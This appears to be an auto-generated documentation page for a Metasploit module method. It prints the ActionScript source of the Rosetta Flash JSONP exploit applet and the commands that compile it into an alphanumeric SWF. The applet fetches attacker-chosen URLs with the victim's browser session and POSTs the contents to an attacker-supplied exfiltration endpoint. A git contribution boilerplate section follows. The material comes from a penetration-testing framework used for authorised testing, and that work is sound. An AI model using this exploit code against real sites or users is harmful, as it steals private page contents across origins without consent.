metasploit-framework

https://github.com/rapid7/metasploit-framework

Ruby

Metasploit Framework

MetasploitModule#encoded_swf

Based off of http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/

Alphanumeric Flash swf applet that steals URLs. Compiled from the following code:

class X {
  static var app : X;

  function getURL(url:String) {
    var r:LoadVars = new LoadVars();
    r.onData = function(src:String) {
      if (_root.exfiltrate) {
        var w:LoadVars = new LoadVars();
        w.x = url+"\n"+src;
        w.sendAndLoad(_root.exfiltrate, w, "POST");
      }
    }
    r.load(url, r, "GET");
  }

  function X(mc) {
    if (_root.url) {
      var urls:Array = _root.url.split(",");
      for (var i in urls) {
        getURL(urls[i]);
      }
    }
  }

  // entry point
  static function main(mc) {
    app = new X(mc);
  }
}


 Compiling the .as using mtasc and swftool:

 > mtasc.exe -swf out.swf -main -header 800:600:20 exploit.as
 $ swfcombine -d out.swf -o out-uncompressed.swf
 $ rosettaflash --input out-uncompressed.swf --output out-ascii.swf

Source | Google | Stack overflow

Edit

git clone [email protected]:rapid7/metasploit-framework.git

cd metasploit-framework

open modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb

Contribute

# Make a new branch

git checkout -b -your-name--update-docs-MetasploitModule-encoded_swf-for-pr

# Commit to git

git add modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rbgit commit -m "better docs for MetasploitModule#encoded_swf"

# Open pull request

gem install hub # on a mac you can `brew install hub`

hub fork

git push <your name> -your-name--update-docs-MetasploitModule-encoded_swf-for-pr

hub pull-request

# Celebrate!